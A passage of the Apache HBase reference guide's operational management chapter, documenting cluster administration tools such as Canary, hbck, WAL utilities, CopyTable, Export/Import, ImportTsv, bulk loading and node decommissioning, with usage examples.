n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. 
You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter will cover operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for the _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThere is a Canary class that can help users canary-test the HBase cluster status, at the granularity of every column family of every region, or at RegionServer granularity.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...] | [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool returns non-zero error codes to the user so that it can integrate with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----\n\n
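For example, a minimal sketch of a wrapper built on these exit codes (the mapping to Nagios-style statuses is an illustrative assumption, not part of the tool):\n\n[source,bash]\n----\n#!\/usr\/bin\/env bash\n# Run one canary check and translate its exit code for a monitoring system.\n${HBASE_HOME}\/bin\/hbase canary\ncase $? in\n 0) echo \"OK - canary checks passed\" ;;\n 3) echo \"WARNING - canary check timed out\"; exit 1 ;;\n *) echo \"CRITICAL - canary reported an error\"; exit 2 ;;\nesac\n----\n\n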
The following examples are based on this case: there are two tables, test-01 and test-02, each with two column families, cf1 and cf2, deployed on 3 RegionServers, as shown in the following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. 
column family cf2 in 8ms\n----\n\nAs you can see, table test-01 has two regions and two column families, so the Canary tool picks 4 small pieces of data from 4 (2 regions * 2 stores) different stores.\nThis is the tool's default behavior.\n\n==== Canary test for every column family (store) of every region of specific table(s)\n\nYou can also test one or more specific tables.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary test-01 test-02\n----\n\n==== Canary test with RegionServer granularity\n\nThis picks one small piece of data from each RegionServer; you can also pass RegionServer names as input options to canary-test specific RegionServers.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -regionserver\n\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms\n----\n\n==== Canary test with regular expression pattern\n\nThis will test both table test-01 and test-02.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -e test-0[1-2]\n----\n\n==== Run canary test in daemon mode\n\nRun repeatedly with the interval defined by the `-interval` option, whose default value is 6 seconds.\nThis daemon will stop itself and return a non-zero error code if any error occurs, because the default value of the `-f` option is true.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon\n----\n\nRun repeatedly with the specified interval, without stopping even if errors occur in the test, by passing `-f false`.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon -interval 50000 -f false\n----\n\n==== Force timeout if canary test is stuck\n\nIn some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.\nBecause of this we provide a timeout option to kill the canary test and return a non-zero error code.\nThis run sets the timeout value to 60 seconds; the default value is 600 seconds.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -t 60000\n----\n\n==== Enable write sniffing in canary\n\nBy default, the canary tool only checks read operations, so it's hard to find problems in the\nwrite path. To enable the write sniffing, you can run canary with the `-writeSniffing` option.\nWhen the write sniffing is enabled, the canary tool will create an hbase table and make sure the\nregions of the table are distributed across all region servers. In each sniffing period, the canary\ntries to put data to these regions to check the write availability of each region server.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing\n----\n\nThe default write table is `hbase:canary` and can be specified by the option `-writeTable`.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -writeTable ns:canary\n----\n\nThe default size of each put's value is 10 bytes, and you can set it with the config key:\n`hbase.canary.write.value.size`.\n\n
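For example, to use a larger value for the sniffing puts, the key can be overridden on the command line (a sketch, assuming the `-D` option from the usage above applies here; 100 bytes is an illustrative value):\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -Dhbase.canary.write.value.size=100\n----\n\n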
==== Treat read \/ write failure as error\n\nBy default, the canary tool only logs read failures, due to e.g. RetriesExhaustedException,\nwhile returning a normal exit code. To treat read \/ write failures as errors, you can run canary\nwith the `-treatFailureAsError` option. When enabled, a read \/ write failure results in an error\nexit code.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary --treatFailureAsError\n----\n\n==== Running Canary in a Kerberos-enabled Cluster\n\nTo run Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:\n\n* `hbase.client.keytab.file`\n* `hbase.client.kerberos.principal`\n\nKerberos credentials are refreshed every 30 seconds when Canary runs in daemon mode.\n\nTo configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.\n\n* `hbase.client.dns.interface`\n* `hbase.client.dns.nameserver`\n\n.Canary in a Kerberos-Enabled Cluster\n====\nThis example shows each of the properties with valid values.\n\n[source,xml]\n----\n<property>\n <name>hbase.client.kerberos.principal<\/name>\n <value>hbase\/_HOST@YOUR-REALM.COM<\/value>\n<\/property>\n<property>\n <name>hbase.client.keytab.file<\/name>\n <value>\/etc\/hbase\/conf\/keytab.krb5<\/value>\n<\/property>\n<!-- optional params -->\n<property>\n <name>hbase.client.dns.interface<\/name>\n <value>default<\/value>\n<\/property>\n<property>\n <name>hbase.client.dns.nameserver<\/name>\n <value>default<\/value>\n<\/property>\n----\n====\n\n[[health.check]]\n=== Health Checker\n\nYou can configure HBase to run a script periodically and if it fails N times (configurable), have the server exit.\nSee _HBASE-7351 Periodic health check script_ for configuration and details.\n\n=== Driver\n\nSeveral frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin\/hbase_ command.\nThese utilities represent MapReduce jobs which run on your cluster.\nThey are run in the following way, replacing _UtilityName_ with the utility you want to run.\nThis command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.\n\n----\n\n${HBASE_HOME}\/bin\/hbase org.apache.hadoop.hbase.mapreduce.UtilityName\n----\n\nThe following utilities are available:\n\n`LoadIncrementalHFiles`::\n Complete a bulk data load.\n\n`CopyTable`::\n Export a table from the local cluster to a peer cluster.\n\n`Export`::\n Write table data to HDFS.\n\n`Import`::\n Import data written by a previous `Export` operation.\n\n`ImportTsv`::\n Import data in TSV format.\n\n`RowCounter`::\n Count rows in an HBase table.\n\n`CellCounter`::\n Count cells in an HBase table.\n\n`replication.VerifyReplication`::\n Compare the data from tables in two different clusters.\n WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.\n Note that this command is in a different package than the others.\n\nEach command except `RowCounter` and `CellCounter` accepts a single `--help` argument to print usage instructions.\n\n[[hbck]]\n=== HBase `hbck`\n\nTo run `hbck` against your HBase cluster run `$.\/bin\/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.\nIf your cluster reports inconsistencies, pass `-details` to see more detail emitted.\nIf there are inconsistencies, run `hbck` a few times because the inconsistency may be transient (e.g. 
cluster is starting up or a region is splitting).\n Passing `-fix` may correct the inconsistency (this is an experimental feature).\n\nFor more information, see <<hbck.in.depth>>.\n\n[[hfile_tool2]]\n=== HFile Tool\n\nSee <<hfile_tool>>.\n\n=== WAL Tools\n\n[[hlog_tool]]\n==== `FSHLog` tool\n\nThe main method on `FSHLog` offers manual split and dump facilities.\nPass it WALs or the product of a split, the content of the _recovered.edits_ directory.\n\nYou can get a textual dump of a WAL file content by doing the following:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\nThe return code will be non-zero if there are any issues with the file, so you can test the soundness of the file by redirecting `STDOUT` to `\/dev\/null` and testing the program return.\n\nSimilarly you can force a split of a log file directory by doing:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/\n----\n\n[[hlog_tool.prettyprint]]\n===== WAL Pretty Printer\n\nThe WAL Pretty Printer is a tool with configurable options to print the contents of a WAL.\nYou can invoke it via the HBase cli with the 'wal' command.\n\n----\n $ .\/bin\/hbase wal hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\n.WAL Printing in older versions of HBase\n[NOTE]\n====\nPrior to version 2.0, the WAL Pretty Printer was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.\nIn those versions, you can print the contents of a WAL using the same configuration as above, but with the 'hlog' command.\n\n----\n $ .\/bin\/hbase hlog hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n====\n\n[[compression.tool]]\n=== Compression Tool\n\nSee <<compression.test,compression.test>>.\n\n[[copy.table]]\n=== CopyTable\n\nCopyTable is a utility that can copy part or all of a table, either to the same cluster or another cluster.\nThe target table must first exist.\nThe usage is as follows:\n\n----\n\n$ .\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\nUsage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>\n\nOptions:\n rs.class hbase.regionserver.class of the peer cluster,\n specify if different from current cluster\n rs.impl hbase.regionserver.impl of the peer cluster,\n startrow the start row\n stoprow the stop row\n starttime beginning of the time range (unixtime in millis)\n without endtime means from starttime to forever\n endtime end of the time range. 
Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeper.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, the CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:http:\/\/www.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of a table to HDFS in a sequence file.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored. 
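For example, assuming a table named MyTable, the following sketch exports up to 3 versions of each cell to the given output directory:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export MyTable \/export\/MyTable 3\n----\n\n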
To export more than one version, replace *_<versions>_* with the desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. 
To instead generate\nHFiles of data to prepare for a bulk data load, pass the option:\n -Dimporttsv.bulk.output=\/path\/for\/output\n Note: the target table will be created with default column family descriptors if it does not already exist.\n\nOther options that may be specified with -D include:\n -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line\n '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs\n -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import\n -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper\n----\n\n[[importtsv.example]]\n==== ImportTsv Example\n\nFor example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns \"c1\" and \"c2\".\n\nAssume that an input file exists as follows:\n----\n\nrow1\tc1\tc2\nrow2\tc1\tc2\nrow3\tc1\tc2\nrow4\tc1\tc2\nrow5\tc1\tc2\nrow6\tc1\tc2\nrow7\tc1\tc2\nrow8\tc1\tc2\nrow9\tc1\tc2\nrow10\tc1\tc2\n----\n\nFor ImportTsv to use this input file, the command line needs to look like this:\n\n----\n\n HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs:\/\/storefileoutput datatsv hdfs:\/\/inputfile\n----\n\n\\... and in this example the first column is the rowkey, which is why the HBASE_ROW_KEY is used.\nThe second and third columns in the file will be imported as \"d:c1\" and \"d:c2\", respectively.\n\n[[importtsv.warning]]\n==== ImportTsv Warning\n\nIf you are preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.\n\n[[importtsv.also]]\n==== See Also\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n[[completebulkload]]\n=== CompleteBulkLoad\n\nThe `completebulkload` utility will move generated StoreFiles into an HBase table.\nThis utility is often used in conjunction with output from <<importtsv,importtsv>>.\n\nThere are two ways to invoke this utility, with explicit classname and via the driver:\n\n.Explicit Classname\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.LoadIncrementalHFiles <hdfs:\/\/storefileoutput> <tablename>\n----\n\n.Driver\n----\nHADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar completebulkload <hdfs:\/\/storefileoutput> <tablename>\n----\n\n[[completebulkload.warning]]\n==== CompleteBulkLoad Warning\n\nData generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.\nAssuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n=== WALPlayer\n\nWALPlayer is a utility to replay WAL files into HBase.\n\nThe WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds). The WAL is filtered to this set of tables.\nThe output can optionally be mapped to another set of tables.\n\nWALPlayer can also generate HFiles for later bulk importing; in that case, only a single table and no mapping can be specified.\n\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]\n----\n\nFor example:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer \/backuplogdir oldTable1,oldTable2 newTable1,newTable2\n----\n\nWALPlayer, by default, runs as a mapreduce job.\nTo NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flag `-Dmapreduce.jobtracker.address=local` on the command line.\n\n
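For instance, a sketch of a local (non-mapreduce) replay of a single table, assuming the same backup directory as above:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer -Dmapreduce.jobtracker.address=local \/backuplogdir oldTable1 newTable1\n----\n\n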
For more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.

=== WALPlayer

WALPlayer is a utility to replay WAL files into HBase.

The WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds).
The WAL is filtered to this set of tables.
The output can optionally be mapped to another set of tables.

WALPlayer can also generate HFiles for later bulk importing; in that case, only a single table and no mapping can be specified.

Invoke via:

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]
----

For example:

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer /backuplogdir oldTable1,oldTable2 newTable1,newTable2
----

WALPlayer, by default, runs as a mapreduce job.
To NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flag `-Dmapreduce.jobtracker.address=local` on the command line.

[[rowcounter]]
=== RowCounter and CellCounter

link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/mapreduce/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.
This is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.
It will run the mapreduce all in a single process, but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit the time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]
----

RowCounter only counts one version per cell.

Note: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.

HBase ships another diagnostic mapreduce job called link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/mapreduce/CellCounter.html[CellCounter].
Like RowCounter, it scans your table, but it gathers more fine-grained statistics.
The statistics gathered by CellCounter include:

* Total number of rows in the table.
* Total number of CFs across all rows.
* Total qualifiers across all rows.
* Total occurrence of each CF.
* Total occurrence of each qualifier.
* Total number of versions of each qualifier.

The program allows you to limit the scope of the run.
Provide a row regex or prefix to limit the rows to analyze.
Specify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.

Use `hbase.mapreduce.scan.column.family` to specify scanning a single column family.

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]
----

Note: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.

=== mlockall

It is possible to optionally pin your servers in physical memory making them less likely to be swapped out in oversubscribed environments by having the servers call link:http://linux.die.net/man/2/mlockall[mlockall] on startup.
See link:https://issues.apache.org/jira/browse/HBASE-4391[HBASE-4391 Add ability to start RS as root and call mlockall] for how to build the optional library and have it run on startup.

[[compaction.tool]]
=== Offline Compaction Tool

See the usage for the link:http://hbase.apache.org/devapidocs/org/apache/hadoop/hbase/regionserver/CompactionTool.html[CompactionTool].
Run it like:

[source, bash]
----
$ ./bin/hbase org.apache.hadoop.hbase.regionserver.CompactionTool
----
=== `hbase clean`

The `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.
It is appropriate to use for testing.
Run it with no options for usage instructions.
The `hbase clean` command was introduced in HBase 0.98.

----
$ bin/hbase clean
Usage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)
Options:
 --cleanZk cleans hbase related data from zookeeper.
 --cleanHdfs cleans hbase related data from hdfs.
 --cleanAll cleans hbase related data from both zookeeper and hdfs.
----

=== `hbase pe`

The `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.
The `hbase pe` command was introduced in HBase 0.98.4.

The PerformanceEvaluation tool accepts many different options and commands.
For usage instructions, run the command with no options.

To run PerformanceEvaluation prior to HBase 0.98.4, issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.

The PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and ability to "warm up" the cluster before testing starts.

=== `hbase ltt`

The `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.
The `hbase ltt` command was introduced in HBase 0.98.4.

You must specify either `-write` or `-update-read` as the first option.
For general usage instructions, pass the `-h` option.

To run LoadTestTool prior to HBase 0.98.4, issue the command +hbase org.apache.hadoop.hbase.util.LoadTestTool+.

The LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, testing security-related features, ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.

[[ops.regionmgt]]
== Region Management

[[ops.regionmgt.majorcompact]]
=== Major Compaction

Major compactions can be requested via the HBase shell or link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/client/Admin.html#majorCompact%28java.lang.String%29[Admin.majorCompact].

Note: major compactions do NOT do region merges.
See <<compaction,compaction>> for more information about compactions.

[[ops.regionmgt.merge]]
=== Merge

Merge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).

[source,bourne]
----
$ bin/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>
----

If you feel you have too many regions and want to consolidate them, Merge is the utility you need.
Merge must be run when the cluster is down.
See the link:http://ofps.oreilly.com/titles/9781449396107/performance.html[O'Reilly HBase Book] for an example of usage.

You will need to pass 3 parameters to this application.
The first one is the table name.
The second one is the fully qualified name of the first region to merge, like "table_name,\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.".
The third one is the fully qualified name for the second region to merge.
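For instance, a complete invocation might look like the following; the table and both region names here are hypothetical placeholders in the format just described:

[source,bourne]
----
# Merge two adjoining regions of 'table_name' while the cluster is down.
# Copy the exact region names, e.g. from the table's listing in the web UI.
$ bin/hbase org.apache.hadoop.hbase.util.Merge table_name \
    "table_name,\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b." \
    "table_name,\x30,1342956111995.0123456789abcdef0123456789abcdef."
----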
Additionally, there is a Ruby script attached to link:https://issues.apache.org/jira/browse/HBASE-1621[HBASE-1621] for region merging.

[[node.management]]
== Node Management

[[decommission]]
=== Node Decommission

You can stop an individual RegionServer by running the following script in the HBase directory on the particular node:

----
$ ./bin/hbase-daemon.sh stop regionserver
----

The RegionServer will first close all regions and then shut itself down.
On shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.
The master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the regions the RegionServer was carrying.

.Disable the Load Balancer before Decommissioning a node
[NOTE]
====
If the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just decommissioned RegionServer.
Avoid any problems by disabling the balancer first.
See <<lb,lb>> below.
====

.Kill Node Tool
[NOTE]
====
In hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.
Hardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.
It deletes all the znodes of the server, starting the recovery process.
Plug the script into your monitoring/fault detection tools to initiate faster failover.
Be careful how you use this disruptive tool.
Copy the script if you need to make use of it in a version of hbase previous to hbase-2.0.
====

A downside to the above stop of a RegionServer is that regions could be offline for a good period of time.
Regions are closed in order.
If there are many regions on the server, the first region to close may not be back online until all regions close and after the master notices the RegionServer's znode gone.
In Apache HBase 0.90.2, we added a facility for having a node gradually shed its load and then shut itself down.
Apache HBase 0.90.2 added the _graceful_stop.sh_ script.
Here is its usage:

----
$ ./bin/graceful_stop.sh
Usage: graceful_stop.sh [--config <conf-dir>] [--restart] [--reload] [--thrift] [--rest] <hostname>
 thrift If we should stop/start thrift before/after the hbase stop/start
 rest If we should stop/start rest before/after the hbase stop/start
 restart If we should restart after graceful stop
 reload Move offloaded regions back on to the stopped server
 debug Move offloaded regions back on to the stopped server
 hostname Hostname of server we are to stop
----

